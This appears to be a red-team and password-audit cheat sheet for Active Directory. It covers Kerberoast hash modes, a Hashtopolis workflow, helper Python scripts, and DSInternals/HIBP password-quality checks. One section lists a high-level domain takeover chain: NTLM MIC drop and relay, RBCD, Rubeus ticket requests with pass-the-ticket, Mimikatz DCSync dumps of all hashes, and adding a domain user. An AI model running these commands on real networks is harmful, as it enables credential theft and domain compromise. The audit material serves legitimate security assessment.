
Hash cracking

Password modes

| Hashtype | Example | Mode |
|---|---|---|
| Kerberos RC4 | `$krb5tgs$23$` | 13100 |
| Kerberos AES256 | `$krb5tgs$18$` | 19700 |

Hashtopolis

When cracking Kerberoast hashes, first separate them by encryption type, since each type corresponds to a different hashcat mode (see the table above).

In Hashtopolis:

  1. Create a new hashlist, select the corresponding Kerberos hashtype and paste your hashes.
  2. Create a new task, assign your wordlist and delete the appended `.???` from the command line arguments.
  3. Open the saved task and assign the agent to it.
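The splitting step above is easy to get wrong by hand when a Kerberoast dump mixes RC4 and AES tickets. The following script is an added example (not code from the original page or from Hashtopolis): it reads a mixed hash file, keys only on the etype field of the `$krb5tgs$<etype>$...` format, and writes one file per hashcat mode so each can be pasted into its own hashlist. Besides the two etypes in the table, it also maps etype 17 (AES128) to hashcat mode 19600; the sample lines are constructed and their hex payloads are placeholders, not real ticket data.

```python
"""Sort a mixed file of Kerberoast (TGS-REP) hashes into one file per hashcat
mode, so each batch can be pasted into a Hashtopolis hashlist with the right
hashtype selected.

Added example (not code from the original page). It keys only on the etype
field of the "$krb5tgs$<etype>$..." format; the sample lines below are
constructed and their hex payloads are placeholders, not real ticket data.
"""
import re
from collections import defaultdict
from pathlib import Path

# etype -> hashcat mode. 23 (RC4) and 18 (AES256) are the modes in the table
# above; 17 (AES128) is hashcat mode 19600 and is added for completeness.
ETYPE_TO_MODE = {23: 13100, 18: 19700, 17: 19600}

_KRB5TGS = re.compile(r"^\$krb5tgs\$(\d+)\$")


def classify(line):
    """Return (hashcat_mode, etype) for one hash line.

    mode is None when the etype is not one we map; both are None when the
    line is not a $krb5tgs$ hash at all.
    """
    match = _KRB5TGS.match(line.strip())
    if not match:
        return None, None
    etype = int(match.group(1))
    return ETYPE_TO_MODE.get(etype), etype


def split_by_mode(lines):
    """Group hash lines by hashcat mode; anything unrecognised goes to 'skipped'."""
    groups = defaultdict(list)
    for raw in lines:
        line = raw.strip()
        if not line:
            continue
        mode, _etype = classify(line)
        groups[mode if mode is not None else "skipped"].append(line)
    return dict(groups)


def write_hashlists(groups, outdir):
    """Write mode_<N>.txt per mode under outdir; returns the written paths."""
    outdir = Path(outdir)
    outdir.mkdir(parents=True, exist_ok=True)
    written = []
    for mode, hashes in groups.items():
        if mode == "skipped":
            continue
        path = outdir / f"mode_{mode}.txt"
        path.write_text("\n".join(hashes) + "\n")
        written.append(path)
    return written


# Constructed sample: three tickets of different etypes plus one junk line.
SAMPLE_HASHES = """\
$krb5tgs$23$*svc_sql$EXAMPLE.LOCAL$MSSQLSvc/sql01.example.local*$0011223344556677$8899aabbccddeeff
$krb5tgs$18$svc_http$EXAMPLE.LOCAL$*http/web01.example.local*$8899aabb$0011223344556677
$krb5tgs$17$svc_app$EXAMPLE.LOCAL$*host/app01.example.local*$8899aabb$0011223344556677
this line is not a hash
"""

if __name__ == "__main__":
    groups = split_by_mode(SAMPLE_HASHES.splitlines())
    for mode, hashes in groups.items():
        print(f"{mode}: {len(hashes)} line(s)")
    # Uncomment to write the per-mode files next to the script:
    # write_hashlists(groups, "hashlists")
```

Lines whose etype is not in the map end up under `skipped` rather than being silently dropped, so an unexpected etype in a dump is visible before any task is created.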

NTLMv1

This only works with NTLMv1, because the MIC (Message Integrity Code) can be dropped/omitted from the request. It is not applicable to NTLMv2.

Bypass NTLM Message Integrity Check - Drop the MIC

Example attack chain (high-level):

  1. Coerce authentication to a notebook you control, then relay it between systems (e.g. DC1 to DC2).
  2. Configure resource-based constrained delegation (RBCD) for your controlled notebook.
  3. Request a service ticket for LDAP via Rubeus: `.\Rubeus.exe s4u /impersonateUser:admin /msdsspn:ldap/DC.example.local /rc4:<HASH> /user:<controlled-nb-name> /ptt /nowrap`
  4. Start Mimikatz and use DCSync to retrieve a DA password hash: `lsadump::dcsync /user:admin /domain:example.local`
  5. Optionally dump all users: `lsadump::dcsync /all /domain:lab.local /csv`
  6. Request a Kerberos TGT via Rubeus asktgt: `.\Rubeus.exe asktgt /user:admin /rc4:<RC4-Hash>`
  7. Perform actions (e.g. `net user /add USERNAME PASSWORD /domain`) using the issued TGT.

DC Sync

```powershell
powershell -ep bypass -c "Import-Module DSInternals; Get-ADReplAccount -All -Server dc1.example.local" > accounts.txt
```

Store the DCSync result in a variable

```powershell
$accounts = Get-ADReplAccount -All -Server <dc-ip> -Credential (Get-Credential)
```

Mimikatz DCSync export for password cracking

```powershell
.\mimikatz.exe "lsadump::dcsync /all /csv" > accounts-csv.txt
```

DSInternals

Setup

```powershell
Install-Module -Name DSInternals -Force
Import-Module -Name DSInternals
```

Test-PasswordQuality

```powershell
$accounts = Get-ADReplAccount -All -Server <dc-ip> -Credential (Get-Credential)
$accounts | Test-PasswordQuality > testPwdQuality.txt
```

HIBP database

Download the NTLM password hash list from haveibeenpwned.com with the official downloader:

https://github.com/HaveIBeenPwned/PwnedPasswordsDownloader

```powershell
$accounts | Test-PasswordQuality -WeakPasswordHashesFile "C:\temp\pwnedpasswords_ntlm.txt"
# Affected accounts are listed in the output under this heading:
# Passwords of these accounts have been found in the dictionary:
```
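To show what the `-WeakPasswordHashesFile` comparison actually does, here is an added example (not code from the page or from DSInternals) that performs the same check offline in Python: it loads a small `account,nthash` export, streams the much larger HIBP NTLM file once, and reports both accounts whose hash appears in the leak and accounts that share a password. It assumes the downloader's `<hex NT hash>:<count>` line layout; the export format and all counts are constructed, and the two recognisable hashes are the well-known NT hashes of "password" and of the empty string.

```python
"""Offline check of NT hashes from a DCSync export against a downloaded
HIBP NTLM list (the same check Test-PasswordQuality -WeakPasswordHashesFile
performs), plus a report of accounts that share a password.

Added example, not code from the page or from DSInternals. Assumptions:
  - the HIBP file is the PwnedPasswordsDownloader NTLM output, one
    "<hex NT hash>:<prevalence count>" per line;
  - the export is "<account>,<nt hash>" per line (a constructed sample here).
The HIBP list is far larger than the export, so it is streamed once while
only the organisation's hashes are held in memory.
"""
from collections import defaultdict

HEX_DIGITS = set("0123456789abcdefABCDEF")


def parse_accounts(lines):
    """Return {NT_HASH_UPPER: [account, ...]} from "account,nthash" lines."""
    by_hash = defaultdict(list)
    for raw in lines:
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        account, _, nthash = line.partition(",")
        nthash = nthash.strip()
        if len(nthash) != 32 or not set(nthash) <= HEX_DIGITS:
            raise ValueError(f"bad NT hash for {account!r}: {nthash!r}")
        by_hash[nthash.upper()].append(account.strip())
    return by_hash


def find_leaked(by_hash, hibp_lines):
    """Stream HIBP lines; return sorted (account, nthash, count) for each hit."""
    counts = {}
    for raw in hibp_lines:
        nthash, _, count = raw.strip().partition(":")
        nthash = nthash.upper()
        if nthash in by_hash:
            counts[nthash] = int(count) if count.isdigit() else 0
    return sorted(
        (account, nthash, count)
        for nthash, count in counts.items()
        for account in by_hash[nthash]
    )


def shared_passwords(by_hash):
    """Return {nthash: accounts} for hashes used by more than one account."""
    return {h: sorted(a) for h, a in by_hash.items() if len(a) > 1}


# Constructed sample export. The first and last hashes are the well-known
# NT hashes of "password" and of the empty string; the other one is a dummy.
SAMPLE_EXPORT = """\
# account,nthash
alice,8846f7eaee8fb117ad06bdd830b7586c
bob,0123456789abcdef0123456789abcdef
svc_backup,8846F7EAEE8FB117AD06BDD830B7586C
carol,31d6cfe0d16ae931b73c59d7e0c089c0
"""

# Constructed excerpt in the downloader's HASH:count layout; counts are made up.
SAMPLE_HIBP = """\
31D6CFE0D16AE931B73C59D7E0C089C0:1234
8846F7EAEE8FB117AD06BDD830B7586C:9999999
FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF:3
"""

if __name__ == "__main__":
    accounts = parse_accounts(SAMPLE_EXPORT.splitlines())
    print("Accounts whose NT hash appears in the HIBP list:")
    for account, nthash, count in find_leaked(accounts, SAMPLE_HIBP.splitlines()):
        print(f"  {account} (seen {count} times)")
    for nthash, names in shared_passwords(accounts).items():
        print(f"Shared password among: {', '.join(names)}")
```

In real use, replace the two sample strings with `open(...)` handles: iterating the HIBP file line by line keeps memory bounded by the size of the export, not the size of the leak list. Normalising both sides to upper case matters because DCSync tools emit lower-case hex while the HIBP list is upper-case.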

Leaked-password corpus with ruleset

Use a leaked-password corpus you are licensed/allowed to use and apply a ruleset such as "OneRuleToRuleThemStill" (https://github.com/stealthsploit/OneRuleToRuleThemStill) to it.

Use Hashcat to create a list of passwords with the ruleset:

```powershell
hashcat --force sysleaks-dict.txt -r ./OneRuleToRuleThemStill.rule --stdout > leaks-with-rules.txt
```

Use the generated list with DSInternals to check for accounts whose password is in it:

```powershell
# leaks-with-rules.txt is the plaintext list produced by the hashcat --stdout step above
$accounts | Test-PasswordQuality -WeakPasswordsFile "C:\temp\leaks-with-rules.txt"
```